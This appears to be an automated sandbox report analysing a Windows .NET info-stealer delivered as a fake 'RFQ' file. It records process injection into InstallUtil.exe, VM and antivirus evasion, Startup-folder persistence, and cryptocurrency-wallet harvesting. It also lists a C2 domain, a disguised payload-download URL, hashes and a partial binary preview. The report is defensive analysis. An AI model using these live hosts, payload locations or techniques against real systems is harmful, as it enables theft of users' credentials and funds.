Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: Count.exe, 00000004.00000002.390502397059.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: Count.exe, 00000004.00000002.390504748872.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: Count.exe, 00000004.00000002.390504748872.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390290705646.00000000010C3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391414687526.00000000053F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 773FA6F0	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 460000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 462000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 8A0008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 773FA6F0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 460000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 462000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 6D9008	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Count.exe "C:\Users\user\AppData\Roaming\Count.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: InstallUtil.exe, 00000002.00000002.391408013496.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391408013496.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391408013496.0000000002F86000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000002.00000002.391408013496.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391408013496.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391408013496.0000000002F86000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager*
Source: InstallUtil.exe, 00000002.00000002.391408013496.0000000002F38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerh{
Source: InstallUtil.exe, 00000002.00000002.391408013496.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391408013496.0000000002F86000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Queries volume information: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Queries volume information: C:\Users\user\AppData\Roaming\Count.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: InstallUtil.exe, 00000002.00000002.391414687526.00000000054B6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Found many strings related to Crypto-Wallets (likely being stolen)

Source: InstallUtil.exe, 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: InstallUtil.exe, 00000002.00000002.391408013496.00000000030A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Jaxx L4
Source: InstallUtil.exe, 00000002.00000002.391408013496.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: InstallUtil.exe, 00000002.00000002.391414687526.0000000005434000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore'
Source: InstallUtil.exe, 00000002.00000002.391408013496.00000000030A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus4:
Source: InstallUtil.exe, 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390310066527.00000000069E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Jump to behavior

Source: Yara match	File source: 00000005.00000002.390659379194.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 3052, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	321 Windows Management Instrumentation	111 Scripting	212 Process Injection	1 Masquerading	OS Credential Dumping	631 Security Software Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Data from Local System	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	341 Virtualization/Sandbox Evasion	Security Account Manager	341 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	212 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	213 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RFQ-12202431_ACD_Group.pif.exe	26%	ReversingLabs	Win32.Trojan.Sonbokli
RFQ-12202431_ACD_Group.pif.exe	29%	Virustotal		Browse
RFQ-12202431_ACD_Group.pif.exe	100%	Avira	HEUR/AGEN.1308638
RFQ-12202431_ACD_Group.pif.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Count.exe	100%	Avira	HEUR/AGEN.1308638
C:\Users\user\AppData\Roaming\Count.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Count.exe	26%	ReversingLabs	Win32.Trojan.Sonbokli

Source	Detection	Scanner	Label
https://www.chirreeirl.com/wp-panel/uploads/Wlvdlivs.mp3	0%	Avira URL Cloud	safe
https://www.chirreeirl.com/	0%	Avira URL Cloud	safe
https://www.chirreeirl.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
pureeratee.duckdns.org	193.187.91.218	true	true	unknown
chirreeirl.com	209.58.149.225	true	false	unknown
www.chirreeirl.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.chirreeirl.com/wp-panel/uploads/Wlvdlivs.mp3	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/mgravell/protobuf-neti	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390311376969.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390292373562.000000000300C000.00000004.00000800.00020000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390311376969.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.390504748872.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.390659379194.00000000029B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390311376969.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp, Count.exe, 00000004.00000002.390523023200.000000000431A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll	InstallUtil.exe, 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.390659379194.00000000029B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354rCannot	InstallUtil.exe, 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.390659379194.00000000029B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390311376969.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.390659379194.00000000029B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390311376969.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe	InstallUtil.exe, 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.390659379194.00000000029B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe	InstallUtil.exe, 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.390659379194.00000000029B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390311376969.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://www.quovadis.bm0	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390309338694.0000000006710000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391414687526.00000000053F0000.00000004.00000020.00020000.00000000.sdmp, Count.exe, 00000004.00000002.390525906958.0000000006088000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.chirreeirl.com	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390292373562.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.390504748872.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390309338694.0000000006710000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391414687526.00000000053F0000.00000004.00000020.00020000.00000000.sdmp, Count.exe, 00000004.00000002.390525906958.0000000006088000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390292373562.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391408013496.00000000030A6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.390504748872.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.chirreeirl.com/	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390290705646.00000000010C3000.00000004.00000020.00020000.00000000.sdmp, Count.exe, 00000004.00000002.390502397059.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
209.58.149.225	chirreeirl.com	United States		394380	LEASEWEB-USA-DAL-10US	false
193.187.91.218	pureeratee.duckdns.org	Sweden		197595	OBE-EUROPEObenetworkEuropeSE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583542
Start date and time:	2025-01-03 01:58:49 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RFQ-12202431_ACD_Group.pif.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@8/4@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 85% Number of executed functions: 422 Number of non-executed functions: 27
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Execution Graph export aborted for target InstallUtil.exe, PID 3052 because it is empty
Execution Graph export aborted for target InstallUtil.exe, PID 5876 because it is empty
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:01:10	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs
20:00:57	API Interceptor	18x Sleep call for process: RFQ-12202431_ACD_Group.pif.exe modified
20:01:17	API Interceptor	2247682x Sleep call for process: InstallUtil.exe modified
20:01:19	API Interceptor	15x Sleep call for process: Count.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
209.58.149.225	https://contract-kitchensbywoodys16713653.brizy.site/	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LEASEWEB-USA-DAL-10US	xd.mpsl.elf	Get hash	malicious	Mirai	Browse	172.241.229.61
	Payload 94.75 (2).225.exe	Get hash	malicious	Unknown	Browse	209.58.145.210
	JHPvqMzKbz.exe	Get hash	malicious	Vidar	Browse	172.241.51.69
	arm7.elf	Get hash	malicious	Unknown	Browse	172.241.27.111
	https://bitfinexinvestment.com/	Get hash	malicious	Unknown	Browse	209.58.153.106
	http://www.web3walletsync.com/	Get hash	malicious	Unknown	Browse	209.58.146.114
	https://click.dn.askhelp247.com/?qs=56daa84a9aeab310141fd7b3abd36125b539fd4f3799231d7ea795f5ca63ee3d16f8d954cbf1ffa46296eb2ff8fe4db6c125eafbd8e358283667a34a51f183ee	Get hash	malicious	Unknown	Browse	172.241.26.5
	https://www.msn.com/en-us/news/politics/sunday-meltdown-trump-floods-truth-social-with-photos-of-swifties-and-communists/ar-AA1p19A0?ocid=socialshare&cvid=d5d44c775cbf4f01a72d252af5f493ba&ei=19	Get hash	malicious	Unknown	Browse	172.241.51.69
	http://nxejt.polluxcastor.top	Get hash	malicious	Unknown	Browse	172.241.51.69
OBE-EUROPEObenetworkEuropeSE	ZppxPm0ASs.exe	Get hash	malicious	Xmrig	Browse	185.157.162.216
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar, Xmrig	Browse	185.157.162.216
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.157.162.216
	file.exe	Get hash	malicious	Xmrig	Browse	185.157.162.216
	file.exe	Get hash	malicious	Amadey, Credential Flusher, DarkVision Rat, LummaC Stealer, Stealc	Browse	185.157.162.216
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse	185.157.162.216
	file.exe	Get hash	malicious	Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar	Browse	185.157.162.216
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse	185.157.162.216
	secondaryTask.vbs	Get hash	malicious	Clipboard Hijacker, MicroClip, Remcos	Browse	185.157.162.126

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	ogVinh0jhq.exe	Get hash	malicious	DCRat	Browse	209.58.149.225
	Sylacauga AL License.msg	Get hash	malicious	Unknown	Browse	209.58.149.225
	https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtml	Get hash	malicious	HTMLPhisher	Browse	209.58.149.225
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	209.58.149.225
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	209.58.149.225
	NOTIFICATION_OF_DEPENDANTS_1.vbs	Get hash	malicious	Xmrig	Browse	209.58.149.225
	CRf9KBk4ra.exe	Get hash	malicious	DCRat	Browse	209.58.149.225
	7FEGBYFBHFBJH32.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Rags Stealer	Browse	209.58.149.225

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1183
Entropy (8bit):	5.356029462517172
Encrypted:	false
SSDEEP:	24:ML9E4K1BIKDE4KhKMaKhRAE4KzDAfE4KnKIE4oKnKo9E4KhROtHM:MxHK1BIYHKh6oRAHKzMfHKntHoAlHKh/
MD5:	54AC8B422C14A1D319806B83D3E54233
SHA1:	A030D676C9697AFAE3D4499EC142700FE059AB38
SHA-256:	A2A67CCAE5BBACFA68E3403DC2F3177F3DA6CD234A0821DA39CB3387C1C5FDFE
SHA-512:	59F41ED9281AED912B0AA719913D351DEC57AF968F490C99D668E033EB2C936B4C813C59C94EB003AE59DB06EEBCCCC8E5426AAE58D003C04B443EC2159B6643
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\10879c5bddb2dd2399e2098d5ca5c9d1\System.Xml.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\b863adc9d550931e279ac7e2ee517d1f\System.Configuration.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=n

C:\Users\user\AppData\Roaming\Count.exe

Download File

Process:	C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	25600
Entropy (8bit):	5.481702907597321
Encrypted:	false
SSDEEP:	384:bTrwOQnF8OrQ96Y8SvNRWrOeY98CfRPdVUvMrELDw+YjzUZ+9q6VDejz8Tu:bfwpn69b8ARW+9jMzZiDFejYa
MD5:	07A7551DA7299874AFD2C3E299ECA83A
SHA1:	250884B7F1C7B152CA82F663D2E91986CEC83DB5
SHA-256:	579054D208BDFDE13C82C6C998E981F0559F69908A1EBC34249C2657A5D1C59D
SHA-512:	4D737E13A950B27356C086751D293731DD5B9400FD1C32F6649391CD6C4B4B8FEC1B7B2DDD90B1F185C3FFB06CACB74821324721FF44CA4534612FDC1899AEF9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....vg.................Z..........ny... ........@.. ....................................`..................................y..W.......v............................................................................ ............... ..H............text...tY... ...Z.................. ..`.rsrc...v............\..............@..@.reloc...............b..............@..B................Py......H........:..@>............................................................($....(....&.s%...%(&...(.....o'...o(...o)....s%...%(.....o...u/...r...po+...o)....s%...%(.....o...u0...r...p .......o,...o).....{=.....{>...V.($.....}=.....}>.... `..# )UU.Z(?....{=...oC...X )UU.Z(A....{>...oD...X2.r...p(G..."..(G...&...(H...&...(I..."..(...."..(...."..(...."..(...."..(...."..(....f.{.... ....?......{....:..{....oD...X:..{....oD...YN.{......('...oV..."..(-...*

C:\Users\user\AppData\Roaming\Count.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Download File

Process:	C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.708307065620167
Encrypted:	false
SSDEEP:	3:FER/n0eFHHoONtkEaKC5yjn:FER/lFHICNaZ5s
